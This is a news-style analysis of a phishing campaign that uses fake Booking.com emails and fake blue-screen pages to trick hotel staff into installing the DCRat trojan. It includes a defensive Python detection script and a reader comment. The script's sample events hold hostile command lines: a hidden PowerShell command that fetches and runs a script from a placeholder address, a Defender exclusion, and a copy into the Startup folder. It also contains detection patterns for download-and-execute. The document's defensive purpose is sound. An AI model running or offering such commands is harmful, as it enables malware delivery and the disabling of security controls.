Cybersecurity researchers recently identified a campaign named PHALT#BLYX that uses fake Blue Screen of Death (BSoD) pages to target the European hospitality sector. This multi-stage attack tricks victims into running malicious commands themselves, and the chain ultimately installs the DCRat remote access trojan on their systems.
The attack begins when a hospitality employee receives a phishing email that appears to come from Booking.com and concerns a cancelled reservation. The email links to a fraudulent website that shows a fake CAPTCHA followed by a simulated system error screen. The page instructs the user to open a Windows command prompt and paste a supplied command to "fix" the problem; that command actually launches PowerShell and starts the infection. Because the victim executes the first stage by hand, no software vulnerability, exploit or download warning is involved, which is what lets the lure slip past controls that watch for malicious attachments.
Once the command is executed, a multi-step delivery process begins by downloading an MSBuild project file from a remote server. The project is run by MSBuild.exe, a signed Microsoft binary, so the next stage executes inside a process that most allow-listing and reputation controls trust. The script then configures Microsoft Defender Antivirus to ignore the malicious activity (typically done by adding exclusions for the malware's paths or processes). If the script is not already running with administrator privileges, it repeatedly re-triggers the User Account Control (UAC) elevation prompt until the user clicks through out of frustration.
While the malware installs itself in the background, the script opens the genuine Booking.com administrative portal in the victim's browser. This serves as a distraction: the user sees the real site and concludes that the email and the "fix" were legitimate parts of their workflow. Meanwhile, the DCRat payload establishes persistence by placing itself in the user's Startup folder, so the attackers keep their access across reboots.
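The stages described above (user-launched PowerShell, MSBuild running a project from a user-writable path, Defender reconfiguration, a burst of UAC prompts, and a drop into the Startup folder) are each unremarkable on their own but distinctive when they appear together on one host. The following detection logic is an added example written for this page, not code from the article or from any vendor: it runs over constructed process-creation events in a simplified Sysmon Event ID 1 shape (the field names, the host names, the path `fix.ps1` and the address 192.0.2.10 are all placeholders, not indicators from the campaign) and correlates the stages per host. The UAC-loop heuristic counts launches of consent.exe, the process Windows starts for each elevation prompt; the threshold and window are assumptions to tune for your environment.

```python
import re
from collections import defaultdict

# Constructed sample events (assumption: one dict per process creation with
# host, ts in epoch seconds, parent image, image and command line). Not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"
CONSENT = r"C:\Windows\System32\consent.exe"
SAMPLE_EVENTS = [
    {"host": "FD-01", "ts": 1000, "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (iwr http://192.0.2.10/fix.ps1)"'},
    {"host": "FD-01", "ts": 1003, "parent": PS, "image": MSBUILD,
     "cmdline": r"MSBuild.exe C:\Users\frontdesk\AppData\Local\Temp\update.proj"},
    {"host": "FD-01", "ts": 1010, "parent": SVCHOST, "image": CONSENT, "cmdline": "consent.exe 1234 560 000001A4"},
    {"host": "FD-01", "ts": 1025, "parent": SVCHOST, "image": CONSENT, "cmdline": "consent.exe 1234 562 000001A8"},
    {"host": "FD-01", "ts": 1041, "parent": SVCHOST, "image": CONSENT, "cmdline": "consent.exe 1234 564 000001AC"},
    {"host": "FD-01", "ts": 1050, "parent": MSBUILD, "image": PS,
     "cmdline": r'powershell -c "Add-MpPreference -ExclusionPath C:\Users\frontdesk\AppData\Roaming"'},
    {"host": "FD-01", "ts": 1052, "parent": PS, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c copy C:\Users\frontdesk\AppData\Roaming\svc.exe "C:\Users\frontdesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svc.exe"'},
    # Benign developer activity on another host: a real build and a single elevation prompt.
    {"host": "DEV-07", "ts": 2000, "parent": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "image": MSBUILD, "cmdline": r"MSBuild.exe C:\src\app\app.csproj"},
    {"host": "DEV-07", "ts": 2005, "parent": SVCHOST, "image": CONSENT, "cmdline": "consent.exe 4321 880 000002B0"},
]

# Patterns for the individual stages. Case-insensitive because Windows paths and
# PowerShell parameters are.
PS_DOWNLOAD_EXEC = re.compile(r"(iex|invoke-expression|encodedcommand|-enc\b|downloadstring|iwr|invoke-webrequest)", re.I)
PS_EVASION = re.compile(r"(-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass)", re.I)
USER_WRITABLE = re.compile(r"\\(Users|Temp|AppData|ProgramData)\\", re.I)
DEFENDER_EXCL = re.compile(r"Add-MpPreference\b.*-Exclusion", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)


def basename(path):
    """Last path component, lower-cased, so rules do not depend on install location."""
    return path.rsplit("\\", 1)[-1].lower()


def stage_of(ev):
    """Return the stage name a single process-creation event matches, or None."""
    img, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    # Stage 1: the victim pastes a command, so PowerShell is a child of cmd.exe or
    # explorer.exe and the command line both downloads/evaluates code and hides itself.
    if (img in ("powershell.exe", "pwsh.exe") and parent in ("cmd.exe", "explorer.exe")
            and PS_DOWNLOAD_EXEC.search(cmd) and PS_EVASION.search(cmd)):
        return "clickfix_launch"
    # Stage 2: MSBuild building a project that lives in a user-writable location.
    if img == "msbuild.exe" and USER_WRITABLE.search(cmd):
        return "msbuild_user_project"
    # Stage 3: Defender told to stop looking.
    if DEFENDER_EXCL.search(cmd):
        return "defender_exclusion"
    # Stage 5: anything written into the per-user Startup folder.
    if STARTUP_DIR.search(cmd):
        return "startup_persistence"
    return None


def uac_prompt_bursts(events, window=60, threshold=3):
    """Hosts where consent.exe (the UAC prompt) started at least `threshold` times
    within `window` seconds; a nagging elevation loop, not a single admin action."""
    by_host = defaultdict(list)
    for ev in events:
        if basename(ev["image"]) == "consent.exe":
            by_host[ev["host"]].append(ev["ts"])
    hits = set()
    for host, times in by_host.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                hits.add(host)
                break
    return hits


def correlate(events, min_stages=2):
    """Per host, the set of distinct stages seen; only hosts with at least
    `min_stages` are reported, which keeps a lone build or exclusion out of the alert."""
    stages = defaultdict(set)
    for ev in events:
        stage = stage_of(ev)
        if stage:
            stages[ev["host"]].add(stage)
    for host in uac_prompt_bursts(events):
        stages[host].add("uac_prompt_loop")
    return {host: sorted(s) for host, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    for host, seen in correlate(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(seen))
```

On the sample data only FD-01 is reported, with all five stages; DEV-07's legitimate MSBuild run from `C:\src` and its single UAC prompt never reach the threshold. In production the same rules would be fed from Sysmon or EDR process telemetry, and `min_stages` is the knob that trades early warning (alert on the first stage alone) against noise.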
DCRat is a modular remote access trojan that lets operators steal sensitive data, log keystrokes and execute commands on the compromised machine. Because the lure quotes room charges in Euros and the source code contains Russian-language elements, researchers assess that the campaign was built by Russian-linked threat actors to target European organizations; language artifacts alone are a weak attribution signal, so treat that assessment as tentative. The chain's reliance on signed Windows binaries such as MSBuild.exe and PowerShell is a living-off-the-land technique, part of a wider trend of hiding malicious behaviour inside legitimate software.
Source: Fake Booking Emails Lure Hotel Staff To BSoD Pages Spreading DCRat

Solid breakdown of the PHALT#BLYX campaign. The fake BSoD to trick users into running PowerShell commands is clever social engineering because it weaponizes the exact moment people are already stressed and looking for a quick fix. Back when I worked IT support, I saw how easily panicked users will copy-paste anything if it looks like an official solution, which is exactly what makes this attack effective.